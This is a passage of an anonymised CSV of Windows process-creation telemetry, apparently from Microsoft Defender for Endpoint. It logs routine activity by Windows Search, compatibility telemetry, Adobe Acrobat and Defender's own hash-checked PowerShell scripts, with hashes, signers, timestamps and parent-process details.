+1312,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:32:13.534813900+00:00,21008,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe746_ Global\UsGthrCtrlFltPipeMssGthrPipe746 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:32:13.547001900+00:00,2021-06-24 01:33:35.742694+00:00,3e6afed6-d533-4600-b8ba-f5580ae27f7d,computerpii_0a470890c60768167990033d701e7bd881398861,172226,False,10.7740.19041.1052,False,11540474045144190,,11540474045175765,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1313,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:53.560990200+00:00,1200,FullTrustNotifier.exe,"""FullTrustNotifier.exe"" SetDeviceId did=""fd2d6ee4-7db5-4f8e-92e8-cc9cfc449a55""",PortableExecutable,2020-10-22 07:42:28+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\FullTrustNotifier.exe,218608,5236a3cd1fc50ea204f57c9f66787dc6,79f2749d62da14edd4b797d0af539e996841c237795932c299b847bb7d2cd159,ba01717f097852cd19729f5e3146076d12bcc5c7,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:40.411672900+00:00,20344,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=3584",False,2021-06-23 00:51:40.351037500+00:00,3584,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:53.588099900+00:00,2021-06-23 00:54:55.405927500+00:00,29b2704b-6001-440c-bfe9-e3399ef6f3ba,computerpii_0a470890c60768167990033d701e7bd881398861,155507,False,10.7740.19041.1052,False,11540474045171820,,11540474045171966,2021-06-23 00:51:40.411672900+00:00,20344,2021-06-23 00:51:40.411672900+00:00,AdobeCollabSync.exe,20344,2304,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-23 00:51:40.344784400+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1314,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:54.241905300+00:00,11976,CompatTelRunner.exe,compattelrunner.exe -m:GeneralTel.dll -f:RunGeneralTelemetry  -cV lLuxDuqu/EOoRVSM.1.2 -SendFullTelemetry -ThrottleUtc,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:53:42.160842100+00:00,2948,CompatTelRunner.exe,CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:lLuxDuqu/EOoRVSM.1,True,2021-06-23 00:53:42.010120800+00:00,8244,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:54.416613500+00:00,2021-06-23 00:54:55.406778700+00:00,d581e0a3-1842-4a6e-844a-f344ca65e853,computerpii_0a470890c60768167990033d701e7bd881398861,155517,False,10.7740.19041.1052,False,11540474045171934,,11540474045171967,2021-06-23 00:53:42.160842100+00:00,2948,2021-06-23 00:53:42.160842100+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,2948,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-23 00:53:42.004793900+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+1315,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:54:07.164101800+00:00,19604,powershell.exe,powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';,PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:53:42.160842100+00:00,2948,CompatTelRunner.exe,CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:lLuxDuqu/EOoRVSM.1,True,2021-06-23 00:53:42.010120800+00:00,8244,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:54:07.333599+00:00,2021-06-23 00:54:55.409398800+00:00,317285a5-eda2-4c71-9b57-ca846fa5fad3,computerpii_0a470890c60768167990033d701e7bd881398861,155549,False,10.7740.19041.1052,False,11540474045171934,,11540474045171970,2021-06-23 00:53:42.160842100+00:00,2948,2021-06-23 00:53:42.160842100+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,2948,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-23 00:53:42.004793900+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1316,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:54:07.183203500+00:00,13020,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:54:07.164101800+00:00,19604,powershell.exe,powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';,True,2021-06-23 00:53:42.160842100+00:00,2948,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:54:07.333973600+00:00,2021-06-23 00:54:55.409486400+00:00,77534cb4-ae76-43f7-8b7b-a6f1b560f219,computerpii_0a470890c60768167990033d701e7bd881398861,155550,False,10.7740.19041.1052,False,11540474045171970,,11540474045171971,2021-06-23 00:54:07.164101800+00:00,19604,2021-06-23 00:54:07.164101800+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,19604,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1317,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:54:14.528957100+00:00,20260,CompatTelRunner.exe,CompatTelRunner.exe -m:appraiser.dll -f:UpdateAvStatus -cv:lLuxDuqu/EOoRVSM.3,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:53:42.010120800+00:00,8244,CompatTelRunner.exe,compattelrunner.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:54:14.617791100+00:00,2021-06-23 00:54:55.412623800+00:00,2d67d71d-c74c-40f0-8fc9-feb1a23520d7,computerpii_0a470890c60768167990033d701e7bd881398861,155583,False,10.7740.19041.1052,False,11540474045171931,,11540474045171972,2021-06-23 00:53:42.010120800+00:00,8244,2021-06-23 00:53:42.010120800+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,8244,18560,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-23 00:53:42.004793900+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+1318,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:54:14.599979800+00:00,15960,CompatTelRunner.exe,CompatTelRunner.exe -m:pcasvc.dll -f:QueryEncapsulationSettings -cv:lLuxDuqu/EOoRVSM.5,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:53:42.010120800+00:00,8244,CompatTelRunner.exe,compattelrunner.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:54:14.619805100+00:00,2021-06-23 00:54:55.412697500+00:00,919dfd9d-4b5d-4478-81f2-1a295f9157d1,computerpii_0a470890c60768167990033d701e7bd881398861,155584,False,10.7740.19041.1052,False,11540474045171931,,11540474045171973,2021-06-23 00:53:42.010120800+00:00,8244,2021-06-23 00:53:42.010120800+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,8244,16512,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-23 00:53:42.004793900+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+1319,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:07.529583300+00:00,12180,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '0120d384f04535fd94f1f51e27079149e7251abacda8dd815423efa40cb669d6')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:07.560704100+00:00,2021-06-23 01:15:28.388377600+00:00,6d4731f4-8172-49c6-b677-b0b7f2650a1e,computerpii_0a470890c60768167990033d701e7bd881398861,157290,False,10.7740.19041.1052,False,11540474045172152,,11540474045172242,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1320,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:07.529759200+00:00,13496,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '30b414c492214690762cafc1ba95e59a299c41730500525ec203c6400675db50')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:07.560928600+00:00,2021-06-23 01:15:28.388430400+00:00,965bb1f4-864e-49ac-a4db-8f31bb77ad0b,computerpii_0a470890c60768167990033d701e7bd881398861,157291,False,10.7740.19041.1052,False,11540474045172152,,11540474045172243,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1321,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:07.530807700+00:00,9804,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '06852d31639fc1cf6572dfe7936e881c69e76ebfe676a416734acc00310f9c3d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:07.561425700+00:00,2021-06-23 01:15:28.388481+00:00,bad8be96-dbfe-4d5a-b3fc-b7af06b7c535,computerpii_0a470890c60768167990033d701e7bd881398861,157292,False,10.7740.19041.1052,False,11540474045172152,,11540474045172244,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1322,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:07.537258900+00:00,10648,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:14:07.529583300+00:00,12180,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '0120d384f04535fd94f1f51e27079149e7251abacda8dd815423efa40cb669d6')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:07.563430+00:00,2021-06-23 01:15:28.388532+00:00,e9eb0c4b-ad6f-44a1-b656-7a0cfdf21541,computerpii_0a470890c60768167990033d701e7bd881398861,157293,False,10.7740.19041.1052,False,11540474045172242,,11540474045172245,2021-06-23 